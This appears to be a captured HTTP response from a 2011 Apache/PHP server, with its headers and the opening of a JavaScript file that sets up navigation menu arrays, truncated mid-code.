HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:15:28 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Last-Modified: Sat, 26 Feb 2011 13:30:03 GMT ETag: "80000000147b7-d5f Accept-Ranges: bytes Content-Length: 3423 Content-Type: application/javascript paramArray = []; HM_Array6758_4 = [paramArray]; paramArray = []; HM_Array6726_4 = [paramArray]; menuPosCol['elMenu6734'] = 'bottom_left'; HM_a_TreesToBuild[HM_a ...[SNIP]... |